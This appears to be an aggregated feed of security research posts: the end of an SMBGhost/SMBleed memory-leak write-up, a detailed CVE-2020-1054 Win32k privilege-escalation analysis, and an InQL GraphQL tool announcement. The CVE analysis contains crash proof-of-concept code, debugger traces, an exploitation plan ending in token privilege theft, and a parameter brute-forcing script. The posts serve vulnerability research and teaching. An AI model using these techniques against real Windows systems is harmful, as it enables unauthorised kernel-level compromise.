Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:

  1. Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
  2. Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.

Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the initialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out of bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.

The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome the limitation, it required sending a large number of packets, hurting performance and stability.

ZecOps Detection

ZecOps classify forensics logs related to this issue as the following tags #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression

Part II – Summary

In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.

CVE-2020-1054 Analysis

15 June 2020 at 14:00

This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).


The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.

The provided crash code:

int main(int argc, char *argv[])
{
    LoadLibrary("user32.dll");
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 
        0x0, 0x0, 0x6);

    return 0;
}

Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

STACK_TEXT:  
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

image 1

It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. CheckPoint Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be continually referenced to throughout the blog post. This value changes across system reboots and sometimes per program execution, however for the sake of continuity will remain the same.


Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240 can be controlled, which will be referred to as oob_target. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

image 2

Working further backwards rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

image 3

rcx is added to by a constant value in the loop. Looking at the assembly this is add ecx, eax. A psuedo-code loop snippet:

var_64h = 0x7fffffff; 
var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_6ch )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical, but it gives the feeling that it is related to arg5 of DrawIconEx. Changing the value from 0xfebffffc to 0xfebffffd:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The result is fff2aaac. This indicates that it is related.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd00000 there is a major change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5 the lower 32 bits of oob_target remains c7000240. Additionally, a decrease in the value of arg5 (treating as unsigned) results in an increase in oob_target.

eax in the oob_target formula is set via an offset from r15:

image 4

Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address to some structure. In the second basic block of the function r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

image 5

The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjecent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SUFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.

The next step, however, is to fully understand how iterations from the oob_target formula is controlled via arg5 of DrawIconEx. Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The relevant function, vInitStrDDA in the notes.txt file of my GitHub repo contains extra detail.

DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered was that arg1 of CreateCompatibleBitmap and arg5 of DrawIconEx directly control the values of both loop_iterations and lDelta. However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 two writes can be performed:

// write 1
win32k!vStrWrite01+0x417
mov     dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

image 5

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

Using this call to DrawIconEx the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of the DrawIconEx stands out to me. The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is equivalent to DI_IMAGE which “Draws the icon or cursor using the image”. The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.

Exploitation Strategy

Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilites are a far cry from an all powerful write-what-where, however in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan01 and sizlBitmap. pvScan01 points to the actual bitmap data. This data can be read/written to using GetBitmapBits and SetBitMapBits. sizlBitMap is two dwords that contain the height and width of the bitmap. Clasically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan01 with the value of the second SURFOBJ’s (referred to as Worker) pvScan01 address. This then allows a reusable/relocatable write-what-where primitive. The capabilities of this OOB write are listed as:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan01 member contents are laid out contiguously. This means that if it is possible to increase either the width or height of sizlBitmap it will be possible to write out-of-bounds of the SURFOBJ’s pvScan01 using a call to SetBitMapBits. If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan01 address can be overwritten. This second SURFOBJ can then be used via SetBitMapBits for a powerful write-what-where primitive.

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c700000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocted at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
2. Calculate loop_iterations*lDelta such that it is equal to fffff901'c7000240.
3. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
4. Use SetBitMapBits with second SURFOBJ to overwrite pvScan01 of third SURFOBJ.
5. Arbitrary reusable write is now obtained.
6. Typical EoP overwrite process token privileges and inject into winlogon.exe.

A bad visual represenation:

image 6

Every step is easily accomplished with the exception of step 3. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR. This is guaranteed to increase the OR’d value, which is what is required. Accurately targeting width or height of sizlBitmap is the challenge. It may be recalled in the start of the blog post oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

image 7

This provides the ability to set an offset from the start of the lower 32 bits where

offset = (arg1 // 0x20 ) * 0x4 + 0x240

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

image 8

The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in psuedo code as:

intial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while(arg2) 
{
    write_location_1 = intial_value + lDelta * loop_count;
    write location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}

Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s csizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...") 

# start with size at 0x50000 
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8 
    # lDelta is always byte alligned so ignore if not
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0,0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, \
                    loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))

Now that all values are understood, all that remains is to write the exploit code.


Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

image 9

Windows 7 KB

Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvment to make memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238. Within the exploit code are 2 comments that mark what value to use depending if the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.


Thanks to Netanel Ben-Simon, Yoav Alon and bee130y for finding the bug:

InQL Scanner v2 is out!

10 June 2020 at 22:00

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

InQL Logo

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced the ability to have a Jython standalone GUI similar to the Burp’s one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL GraphiQL

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL and other Burp Suite tools hence we included a custom “Send to GraphiQL” / “Send To Repeater” flow to be able to move queries back and forth between the tools.

InQL v2 Flow

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL is now handling batched-queries and searching inside queries.

InQL v2 Editor

This was possible through re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representation of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

❌
❌